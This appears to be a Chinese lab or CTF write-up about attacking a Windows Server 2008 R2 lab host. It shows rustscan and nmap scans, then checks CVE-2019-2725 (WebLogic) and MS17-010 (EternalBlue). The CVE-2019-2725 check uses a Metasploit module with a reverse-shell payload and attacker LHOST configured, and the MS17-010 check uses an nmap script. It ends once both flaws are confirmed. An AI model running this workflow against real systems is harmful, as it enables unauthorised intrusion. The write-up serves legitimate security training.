靶场信息
相关注意事项:
二、信息搜集
1、TCP 端口扫描 + 指纹识别 + 操作系统识别
工具:rustscan + nmap
nmap带上-Pn参数,表示不进行主机发现,这是为了避免主机发现失败导致的指纹探测失败。
因为nmap的默认扫描逻辑是这样的:
主机存活探测(ICMP ping / TCP ping) ↓ 没有响应? ↓ 认为主机已下线 → 直接跳过,不扫端口
问题在于,很多主机(尤其是 Windows、有防火墙的服务器)会屏蔽 ICMP,但端口服务完全正常运行。Nmap 误判主机离线,导致你什么都扫不到。
命令:
sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n
输出(由于输出很长,只是截取了关键的部分):
PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Microsoft IIS httpd 7.5 135/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 63 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 3389/tcp open ms-wbt-server? syn-ack ttl 63 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled) 49152/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49176/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49194/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 60966/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu) SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7) SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7) OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11) WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000) ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=) T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=N) U1(R=N) IE(R=N) Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026) TCP Sequence Prediction: Difficulty=265 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)
2、UDP 扫描关键端口 + 指纹识别
补一轮 UDP 扫描,以免漏掉关键信息:
工具:Nmap
命令:
sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80
输出:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800 Nmap scan report for 192.168.111.80 Host is up. PORT STATE SERVICE VERSION 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp 162/udp open|filtered snmptrap 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 514/udp open|filtered syslog 520/udp open|filtered route 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m 1900/udp open|filtered upnp 4500/udp open|filtered nat-t-ike 49152/udp open|filtered unknown Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds
3、优先级列表
目标:大概率是一台 Windows Server 2008 R2
架构:几乎可以确认是 x64
端口聚焦:
PORT STATE SERVICE REASON VERSION 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
T3 协议是 WebLogic 的远程对象协议,默认开放,且历史上反复出现反序列化漏洞。
PORT STATE SERVICE REASON VERSION 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
MS17-010 (EternalBlue) 这个漏洞在 2008 R2 上默认存在,直到打补丁为止。
三、漏洞查找与验证
1、CVE-2019-2725
根据指纹信息查找相关的漏洞:
值得注意的是,关键词限制并不是却多越好,有些时候放宽点关键词,能看到更丰富的信息。
查看 CVE 编号:
zyf@kali:~$ searchsploit -x 46780 | head -10 Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution URL: https://www.exploit-db.com/exploits/46780 Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py Codes: CVE-2019-2725 Verified: False File Type: Python script, ASCII text executable, with very long lines (6251) #!/usr/bin/python # Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
是 CVE-2019-2725,打开 MSF,通过search命令找对应的模块:
msfconsole
msf > search CVE-2019-2725 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService 1 \_ target: Unix . . . . 2 \_ target: Windows . . . . 3 \_ target: Solaris . . . . Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice After interacting with a module you can manually set a TARGET with set TARGET 'Solaris'
使用模块并验证:
msf > use 0 [*] Using configured payload cmd/unix/reverse_bash msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice Platform: Unix, Windows, Solaris Arch: cmd, x64, x86 Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2019-04-23 Provided by: Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com> Module side effects: ioc-in-logs Module stability: crash-safe Module reliability: repeatable-session Available targets: Id Name -- ---- => 0 Unix 1 Windows 2 Solaris Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sap ni, socks4 RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 7001 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /_async/AsyncResponseService yes URL to AsyncResponseService VHOST no HTTP server virtual host Payload information: Description: An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host. References: https://nvd.nist.gov/vuln/detail/CVE-2019-2725 http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999 https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://twitter.com/F5Labs/status/1120822404568244224 View the full module info with the info -d command. msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows target => Windows msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44 LHOST => 192.168.111.44 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80 RHOST => 192.168.111.80 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check [+] 192.168.111.80:7001 - The target is vulnerable.
存在漏洞
2、永恒之蓝
用 Nmap 的 NSE 脚本验证是否存在漏洞:
┌──(zyf㉿kali)-[~/hongr2] └─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800 Nmap scan report for 192.168.111.80 Host is up (0.068s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds
漏洞存在。
)
